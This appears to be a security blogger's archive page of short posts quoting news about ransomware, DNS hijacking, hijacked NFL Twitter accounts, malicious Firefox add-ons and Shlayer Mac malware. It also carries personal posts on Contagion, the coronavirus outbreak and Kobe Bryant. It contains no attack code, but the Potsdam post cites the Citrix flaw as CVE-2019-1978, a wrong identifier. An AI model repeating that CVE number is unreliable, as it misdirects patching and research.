US Defense Contractor Hit with Ransomware Infection

In the United States, contractors with the Department of Defense are required to maintain a minimum baseline of security controls to protect defense related information. Either those controls are not strong enough, or EWA did not implement the correct measures to prevent the ransomware infection:

Electronic Warfare Associates (EWA), a 40-year-old electronics company and a well-known US government contractor, has suffered a ransomware infection, ZDNet has learned.

The infection hit the company last week. Among the systems that had data encrypted during the incident were the company's web servers.

Signs of the incident are still visible online. Encrypted files and ransom notes are still cached in Google search results, even a week after the company took down the impacted web servers.

If you are unfamiliar with with Ryuk, it is one of the nastier ransomware strains:

Making matters worse is that Ryuk is not your regular ransomware strain. This type of ransomware is solely used in targeted attacks on high-profile companies.

It is usually installed on infected networks after a victim is infected with the Emotet/TrickBot trojans, two well-known cybercrime-as-a-service platforms.

The Ryuk gang uses the Emotet/TrickBot-infected machine as entry point and launch pad to scan and spread inside a company's internal network, exfiltrate data, and then deploy their ransomware.

Contagion Hits Top 10 on iTunes Movie Chart Amid Coronavirus Outbreak

Speaking of the Wuhan Coronavirus outbreak, the exceptionally well written and directed Steven Soderbergh movie Contagion has hit the top 10 on iTunes as people become interested in learning about a potential pandemic:

A woman, played by Oscar winner Gwyneth Paltrow, returns home to Minnesota from a business trip in Hong Kong. Though she exhibits fatigue and cold-like symptoms, she dismisses it as jet lag. Within 24 hours, she's dead, alongside her young son. Her husband, played by Matt Damon, is somehow immune and survives.

Thus begins Steven Soderberg's 2011 movie Contagion. Over the next hour and 46 minutes, the movie tracks what happens when a deadly China-born virus goes global and leads to mass chaos as epidemiologists race to find a vaccine.

On Tuesday, the thriller rocketed to No. 10 on the iTunes movie rental chart, where it shares space with such of-the-moment titles as Joker (No. 1), Once Upon a Time in Hollywood (No. 3), Parasite (No. 4) and Hustlers (No. 8).

Notwithstanding the literal batshit craziness known as the Wuhan Coronavirus, Contagion is an outstanding movie. The pacing is amazing, and the story is entirely believable. Even if this outbreak had not occurred I would be recommending this movie.

Epidemics Like the Wuhan Coronavirus are Human-made

The current Wuhan Coronavirus issue has not reached a Contagion-level epidemic but there is a chance the virus could shift towards such a trajectory. I suspect things are going to get substantially worse before getting better. I fly all over the Asia-Pacific region on business, and this outbreak has me quite spooked. At the end of the day, unfortunately, we need to turn around and look at ourselves. Humans are largely responsible for these types of diseases and here are some of the reasons:

Current circumstances include a perilous trade in wildlife for food, with supply chains stretching through Asia, Africa and to a lesser extent, the United States and elsewhere. That trade has now been outlawed in China, on a temporary basis; but it was outlawed also during SARS, then allowed to resume — with bats, civets, porcupines, turtles, bamboo rats, many kinds of birds and other animals piled together in markets such as the one in Wuhan.

Current circumstances also include 7.6 billion hungry humans: some of them impoverished and desperate for protein; some affluent and wasteful and empowered to travel every which way by airplane. These factors are unprecedented on planet Earth: We know from the fossil record, by absence of evidence, that no large-bodied animal has ever been nearly so abundant as humans are now, let alone so effective at arrogating resources. And one consequence of that abundance, that power, and the consequent ecological disturbances is increasing viral exchanges — first from animal to human, then from human to human, sometimes on a pandemic scale.

We invade tropical forests and other wild landscapes, which harbor so many species of animals and plants — and within those creatures, so many unknown viruses. We cut the trees; we kill the animals or cage them and send them to markets. We disrupt ecosystems, and we shake viruses loose from their natural hosts. When that happens, they need a new host. Often, we are it.

Agent Smith said it best in The Matrix:

Every mammal on this planet instinctively develops a natural equilibrium with the surrounding environment but you humans do not. You move to an area and you multiply and multiply until every natural resource is consumed and the only way you can survive is to spread to another area. There is another organism on this planet that follows the same pattern. Do you know what it is? A virus. Human beings are a disease, a cancer of this planet. You're a plague and we are the cure.

Is There Really a Man Holding an iPhone in This 1937 Painting?

That cannot possibly be what my brain is telling me it is. Surely this is doctored:

It's not clear exactly who this man is, but he might as well be popping off a selfie or thumbing through his news feed. He seems to gaze into the handheld device in such a way that renders all-too-familiar today, as if he's just read a bad tweet or recoiling from a Trump-related push notification from the Times. He would almost look unremarkable, if only he and the world around him existed at any point in the past decade

This is one of the craziest things I have seen. The power of suggestion is strong with this one.

Adversaries with Turkish Nexus Responsible for Cyber Attacks Targeting Europe and the Middle East

A series of cyber attacks beginning in early 2018 and continuing through 2019 are believed to have been carried out by threat adversaries with a nexus to the Turkish government. Approximately thirty organizations across Europe and the Middle East were affected by the operations, ranging from government ministries and agencies, private industry, and other groups:

According to two British officials and one U.S. official, the activity bears the hallmarks of a state-backed cyber espionage operation conducted to advance Turkish interests.

The officials said that conclusion was based on three elements: the identities and locations of the victims, which included governments of countries that are geopolitically significant to Turkey; similarities to previous attacks that they say used infrastructure registered from Turkey; and information contained in confidential intelligence assessments that they declined to detail.

The officials said it wasn’t clear which specific individuals or organizations were responsible but that they believed the waves of attacks were linked because they all used the same servers or other infrastructure.

What techniques did these purported nation state threat actors leverage?

The hackers used a technique known as DNS hijacking, according to the Western officials and private cybersecurity experts. This involves tampering with the effective address book of the internet, called the Domain Name System (DNS), which enables computers to match website addresses with the correct server.

By reconfiguring parts of this system, hackers were able to redirect visitors to imposter websites, such as a fake email service, and capture passwords and other text entered there.

Essentially, the initial goal of the threat activity was credential harvesting. If you are unfamiliar with the term, it is the act of tricking unsuspecting users to input their login credentials into a fraudulent web site or application. It usually starts off with a phishing email directing users to visit a web site which appears to be one the victim legitimately uses, asking them to login, and then storing the credentials for use in a later operation.

Once the attackers had amassed enough credential data, knowing average users often use the same password across multiple logins, the adversaries could then attempt to breach personal accounts - such as Twitter, Facebook, Gmail, and more - as well as their official government or business accounts. The latter being the crown jewels, although the personal accounts may also lead to additional opportunistic, targeted attacks.

What I find most alarming is certain DNS top-level domain providers were breached. The actual DNS servers themselves do not appear to have been affected but a number of organizations controlling them were compromised. Those organizations should know better, and have implemented better security controls, and security awareness.

This demonstrates how anyone can be the victim of a cyber attack.

Hackers Breach Multiple NFL Team Twitter Accounts, Including the 49ers and Chiefs

Pestering hackers are at it again, this time compromising a number of Twitter accounts belonging to National Football League teams, to include the two Super Bowl contenders:

Hackers compromised Twitter accounts belonging to the National Football League and some of its most popular teams, including Super Bowl contenders the San Francisco 49ers and Kansas City Chiefs, in an apparent series of cyberattacks Monday.

The hackers taunted the NFL and the teams in messages saying they were “here to show people that everything is hackable,” and promoted the hackers’ security services via email and Twitter hashtags.

Accounts for the Chicago Bears, Green Bay Packers and Cleveland Browns, among others, were also taken over.

It is not like hacking Twitter accounts is all that difficult. Let us assume the malicious actors attempted to breach more than just Twitter, such as the teams corporate networks, and other online presence. Why have they only thus far been successful with Twitter?

This is largely due to many users not configuring Twitter for two-factor authentication with an authenticator app, such as 1Password, Google Authenticator, or Authy. Had these teams been using TFA there is a much greater chance this attack would not have been successful. I specifically called out the use of an authenticator app rather than SMS because the latter is vulnerable.

It will be interesting to see why only these five teams were selected out of the total thirty-two teams in the NFL today. I doubt it has anything to do with specific motivation to attack these teams, but more so because of lax security on those Twitter accounts.

Security Attacks Cost Singapore Businesses $1.25M per Breach

Channel Asia is reporting on a study recently released by McAfee, claiming the average cost of a cyber attack to a Singapore-based business is approximately $1.25m per breach:

According to McAfee findings, the city-state houses the highest estimated costs stemming from a breach across Asia Pacific, ahead of markets such as Australia, Hong Kong, India, Indonesia, Malaysia, New Zealand and Thailand.

Findings from a survey of 480 cyber security decision-makers at a regional level paint a damning picture for Singapore with 80 per cent of respondents claiming that cyber security incidents pose “high” or “medium” impacts on business.


Estimated costs from respondents in Singapore were more than double that of the next highest country in Asia Pacific, identified as Indonesia with financial implications at roughly S$785,000 per breach.

I would like to know how McAfee, and the various companies they interviewed, arrived at these numbers. Internal incident response is a bit of an art to accurately quantify. Leveraging external resources to assist with breach remediation is much easier to understand.

The likelihood of all of these Singapore-based companies only using outside assistance is small. There is a stronger chance of a more hybrid approach, where internal responders work in conjunction with external help of some sort.

In either case, I am curious to see how these numbers were derived.

German City Potsdam Offline After Cyber Attack

Potsdam, the capital of the German state of Brandenburg, has had to disconnect from the internet due to a cyber attack. Although specifics about how the attack was executed are light, the city claims the attack occurred because of a vulnerable third-party provider:

"The background to this is a weak point in the system of an external provider, which attempts to retrieve data from the state capital from outside without authorization or to install malware," an official statement says.

"In order to analyze the damage and to ensure the security of the data, external IT security companies and IT forensic experts are commissioned to support the IT specialists in the administration with their work."

This is far too sparse on details, and almost sounds word-smithed enough to purposely obfuscate any potential blame. A German journalist believes the attackers may have exploited vulnerable public facing Citrix servers:

While the City of Potsdam's updates on the cyberattack do not go into detail on what was the method the attackers used to infiltrate the network, German journalist Hanno Böck found Citrix ADC servers on the administration's network vulnerable to attacks exploiting the CVE-2019-1978 vulnerability.

Böck says that the servers he found weren't protected using mitigation measures provided by Citrix over a month ago.

It true, this is not at all related to a "weak point in the system of an external provider" but instead a failure of the city IT department to mitigate CVE-2019-1978. Failure to act in cyber space will almost always lead to a compromise.

Never Rely on a Single, Free Security Tool for Analysis

VirusTotal is a valuable resource for checking the verdict on file samples and URL's. Although the service offers a variety of benefits, it should never be the sole trusted resource for conducting analysis, especially in the context of a live incident response operation:

For example, a Defender gets forwarded a phishing email with a link to investigate. The Defender creates the tracking ticket and starts the workflow in their “analysis checklist”. They just want to get through this investigation and close out the ticket. The Defender may not even think about looking at the other things surrounding the email as in whats the content, where did it come from, what are the email headers, and other indicators. The decision to continue or close the investigation has now become all about the outcome of the scan of over 70 AV scanners on VirusTotal. The results (most likely) return that all 70 plus AV scanners claim the link is clean (not one flag). Defender quickly marks all is clear and closes the ticket. In many cases, this might be a quick solution and is not a bad starting point but can provide many false negatives.

Any cyber security analyst worth their salt knows to cross-reference across multiple tools. VirusTotal is merely one of many useful tools for determining authenticity of files and URL's, but is not a one-stop shop to be unequivocally trusted. Any incident response playbook leveraging free applications like VT should contain multiple tools, whether on-site or cloud-based, for analysis.

The same can be said for Hybrid-Analysis. It is a wonderful tool, most often extremely capable of determining whether or not a sample is malicious. It is not infallible, and therefore because it is a free service should be used in conjunction with other free services. Based on an aggregate score across multiple tools, and the context around the threat, defenders and analysts can take appropriate actions.

Kobe Bryant RIP

Kobe Bryant RIP

Another legend has an untimely passing. Kobe was only 41 years old, and passed away with his 13 year old daughter at his side. The legend is survived by his wife and three daughters.

Construction Company Ransomware Attack Raises Questions About Federal Contracts

A recent ransomware attack against a Canadian construction company is raising questions about the level of cyber security controls required, or apparent lack thereof, for industry to win federal contracts.

While it doesn't appear that any secure government files were compromised in the hack, the Bird case raises concerns about how secure government contracts are as the number of ransomware incidents multiplies.

Between 2006 and 2015, Bird scored 48 contracts with the Department of National Defence totalling more than $406 million. Bird also helped build the RCMP's Surrey detachment headquarters and has done work for Public Services and Procurement Canada.

Christyn Cianfarani, president of the Canadian Association of Defence and Security Industries, said Canada could learn from the United States and Britain, countries that have taken steps to ensure the security systems of all government contractors are locked down — even those not dealing with classified information.

Luckily no sensitive files were compromised in the attack. However, one has to wonder how a government contractor has allowed this to occur. Are there no minimum security requirements for Canadian government contractors? Maybe the bar is set so low that a simple ransomware attack is capable of being executed?

While no company can 100% ensure they are safe from attack, there is no reason why a standard ransomware attack should be successful. There are a myriad of endpoint security controls - from next-generation antivirus to endpoint detection & response - capable of either preventing or providing visibility on attacks like ransomware.

Buried within the article is this note:

"When we look at the major hacks that have occurred, especially on the defence side, where you know fighter aircraft information was stolen — it wasn't stolen from the prime contractor, it was stolen in a tiny, tiny shop supplying widgets," she said, citing the 2017 theft of sensitive information about Australia's defence programs through a government contractor.

Whether they're done by nation states or by criminal organizations or by rogue actors, it's a characteristic of these kinds of attacks to get to governments using businesses as the point of entry, especially ... small businesses that tend to be the most vulnerable."

Threat adversaries are not stupid; they do the reconnaissance required to find vulnerable targets. Those tiny shops supplying widgets are, more often than not, the weakest links in the supply chain.

Mozilla Bans Nearly 200 Malicious Firefox Add-Ons

Notwithstanding a few hiccups here and there, Mozilla takes privacy quite seriously. Over the years they have done a lot of valuable work to ensure the web is a safe place to browse. In their latest move, Mozilla has taken a look at the Firefox add-on database and removed nearly two-hundred extensions for including malicious code:

Over the past two weeks, Mozilla's add-on review team has banned 197 Firefox add-ons that were caught executing malicious code, stealing user data, or using obfuscation to hide their source code.

The add-ons have been banned and removed from the Mozilla Add-on (AMO) portal to prevent new installs, but they've also been disabled in the browsers of the users who already installed them.

The bulk of the ban was levied on 129 add-ons developed by 2Ring, a provider of B2B software. The ban was enforced because the add-ons were downloading and executing code from a remote server.

Why is this single, relatively unknown company developing that many add-ons? It sure feels like a huge red flag. Surely there is some deception at play.

Review: Using an iPad Pro for Professional Business Travel

Review: Using an iPad Pro for Professional Business Travel

I travel across Asia-Pacific for business, having clocked 190k miles in the air in 2019. I generally use a MacBook Pro 13" while away on business, but on a recent Australia trip I took only an iPad Pro 12". This is my detailed review of using an iPad Pro for business travel.

Laughably Unsophisticated Mac Malware

Major malware infections on macOS are quite rare but the operating system is, by no means, immune to what Windows users have had to endure for decades. Over the last two years macOS users have been pestered by Shlayer and all the pirated videos it promises to provide the unsuspecting victim:

An analysis Kaspersky Lab published on Thursday says that Shlayer is “a rather ordinary piece of malware” that, except for a recent variant based on a Python script, was built on Bash commands. Under the hood, the workflow for all versions is similar: they collect IDs and system versions and, based on that information, download and execute a file. The download is then deleted to remote traces of an infection. Shlayer also uses curl with the combination of options -f0L, which Thursday’s post said “is basically the calling card of the entire family.”

Another banal detail about Shlayer is its previously mentioned infected method. It’s seeded in links that promise pirated versions of commercial software, episodes of TV shows, or live feeds of sports matches. Once users click, they receive a notice that they should install a Flash update. Never mind that Flash has been effectively deprecated for years and that platforms offering warez and pirated content are a known breeding ground for malware.

Unless you have good self control, good web browsing hygiene, and common sense, stay away from web sites offering pirated content. Is that one free pirated movie worth all the work to rebuild your computer after it gets infected with some malware it should never have in the first place?

Exaggerating Impact of Cyber Attacks Does Nobody any Good

Adam Rowe of writes one of the worst clickbait heading I have seen recently, stating cyber incidents are deemed a bigger global business risk than climate change. Fortunately the article states a much different claim:

Cybersecurity risks are the highest priority for businesses around the globe in 2020, according to an extensive new survey. By comparison, climate change clocked in at seventh as the biggest perceived business risk worldwide.

Granted, that's still climate change's highest ever ranking, and a sign that it's moving up in importance as the effects of humanity's impact on Earth's climate become increasingly extreme.

The Allianz Risk Barometer 2020 conducted research through a survey of over 2,700 experts across 100 countries. These experts were stipulating impact to specific businesses as opposed to the overall global risk as the clickbait headline suggests.

Overall it is not a bad article, but headline hyperbole is strong with this one.